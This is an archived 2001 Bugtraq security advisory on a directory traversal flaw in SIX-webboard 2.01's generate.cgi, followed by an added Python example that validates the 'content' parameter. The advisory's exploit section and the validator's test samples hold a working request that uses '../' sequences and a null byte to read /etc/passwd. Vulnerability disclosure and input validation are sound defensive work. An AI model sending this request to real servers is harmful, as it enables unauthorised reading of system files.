[22228] in bugtraq

SIX-webboard 2.01 "show files" vulnerability

daemon@ATHENA.MIT.EDU (Hannibal Lector)
Mon Aug 13 14:30:21 2001

Date: 13 Aug 2001 16:15:33 -0000
Message-ID: <20010813161533.23245.qmail@securityfocus.com>
From: Hannibal Lector <digitalseed@poizonb0x.org>
To: bugtraq@securityfocus.com

* a little bit late, but "it's better late than never"! * 

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]----------------

-NAME:
 SIX-webboard 2.01 "show files" vulnerability.

-DESCRIPTION: 
 A small but very popular webboard coded by Pipo
(webmaster@sixhead.com).
Find more information about the SIX-webboard here:
http://www.sixhead.com or http://www.sixhead.net.

-PROBLEM:
 '..' and '/' are not filtered while processing user input, so it is
possible to enter arbitrary values to retrieve files from the remote
server which should not normally be accessible.

-EXPLOIT: 
 http://www.target.net/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/passwd%00&board=boardsname
! The above request, if given, will output the file contents of
/etc/passwd.

-AUTHORs:
 Discovery: digitalseed and k$en0r
 Advisory: digitalseed

-DISCLAIMER:
 PoizonB0x may not be held liable for the use or potential effects of
these programs or advisories, nor the content contained within. Use
them at your own risk.

-COPYRIGHT:
 PoizonB0x Crew -  www.poizonb0x.org (c) 2000-2001

--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]----------------
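
Added example, not part of the original advisory and not the webboard's own code: one way a handler could validate the "content" parameter so that the missing '..' and '/' filtering described under -PROBLEM is closed, including the %00 byte seen in the request. It is written in Python for illustration because the advisory does not show the source of generate.cgi; BOARD_ROOT and both function names are assumptions.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Hypothetical directory holding the board's content files (assumption).
BOARD_ROOT = "/var/www/webboard/data"


def safe_content_path(raw_value, root=BOARD_ROOT):
    """Return an absolute path under root for a decoded 'content' value,
    or None if the value must be rejected."""
    # A NUL byte can truncate the file name once it reaches the C library.
    if not raw_value or "\x00" in raw_value:
        return None
    # The advisory's root cause: '..' and '/' were not filtered.
    if "/" in raw_value or "\\" in raw_value or raw_value in (".", ".."):
        return None
    # Defence in depth: resolve symlinks and confirm we are still under root.
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, raw_value))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def check_request(url, root=BOARD_ROOT):
    """Extract 'content' from a request URL and validate it."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get("content", [])
    if len(values) != 1:  # missing or repeated parameter
        return None
    return safe_content_path(values[0], root)


if __name__ == "__main__":
    # First URL is the request from the advisory; second is constructed.
    samples = [
        "http://www.target.net/cgi-bin/webboard/generate.cgi"
        "?content=../../../../../../../../../etc/passwd%00&board=boardsname",
        "http://board.example/cgi-bin/webboard/generate.cgi"
        "?content=news.txt&board=general",
    ]
    for url in samples:
        print("ALLOW" if check_request(url) else "REJECT", url)
```

The check runs on the decoded value, so %2e%2e%2f and %00 are caught after URL decoding rather than by matching the raw query string.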
